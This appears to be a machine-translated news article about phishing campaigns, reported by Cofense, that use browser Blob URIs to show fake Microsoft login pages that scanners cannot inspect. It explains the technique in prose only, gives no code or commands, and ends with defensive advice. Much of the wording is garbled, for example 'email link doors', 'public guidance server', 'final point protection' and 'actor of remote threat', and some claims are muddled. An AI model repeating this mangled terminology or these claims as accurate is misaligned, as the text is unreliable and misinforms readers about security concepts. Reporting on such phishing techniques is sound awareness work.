- Avoid email link doors and safety tools when never hitting a real server
- Blob Uris means that phishing content is not lodged online, so filters never see it coming
- There are no strange URLs, without doubtful domains, only silent robbery of a false Microsoft login page
Security researchers have discovered a series of phishing campaigns that use a rarely exploited technique to steal login credentials, even when those credentials are protected by encryption.
A new research by Cofense warns that the method is based on Blob URI, a feature of the browser designed to show temporary local content, and cybercriminals are now abusing this feature to deliver Phishing pages.
Blob URI is created and access completely within a user’s browser, which means that Phishing content never exists on a public guidance server. This makes it extremely difficult to detect even the most advanced final point protection systems.
A hidden technique that goes through the defenses beyond
In these campaigns, the Phishing process begins with an email that easily avoids the secure email links (SEG). These emails generally contain a link to what seems to be a legitimate page, often housed in trusted domains such as Microsoft OneDrive.
However, this initial page does not house the phishing content directly. Instead, it acts as an intermediary, silently loading an HTML file controlled by the threat actor that decodes in an URI Blob.
The result is a false login page that is presented within the victim’s browser, designed to closely imitate the Microsoft login portal.
For the victim, nothing seems to be out of place, there are no strange URLs or obvious signs of fraud, just a request to log in to see a safe message or access a document. Once they click on ‘Locate’, the page redirects another HTML file controlled by the attacker, which generates a local BLOB URI that shows the counterfeit login page.
Because Blob URI works completely inside the browser memory and are inaccessible from outside the session, traditional security tools cannot scan or block the content.
“This method makes the detection and analysis especially complicated,” said Jacob Malimban, of Cofense’s intelligence team.
“The Phishing page is created and represented locally using an URI Blob. It is not lodged online, so you cannot scan or block in the usual way.”
The credentials entered on the counterfeit page are silently exfiltrated to an end point of the actor of remote threat, leaving the victim unconscious.
Safety filters based in IA also struggle to catch these attacks, since Blob’s URI are rarely used maliciously and may not be well represented in training data. Researchers warn that unless detection methods evolve, this technique is likely to give traction among attackers.
To defend themselves with such threats, organizations are urged to adopt advanced Firewall solutions as a service (FWAAS) and Zero Trust Network Access (ZTNA) that can help ensure access and mark a suspicious login activity.
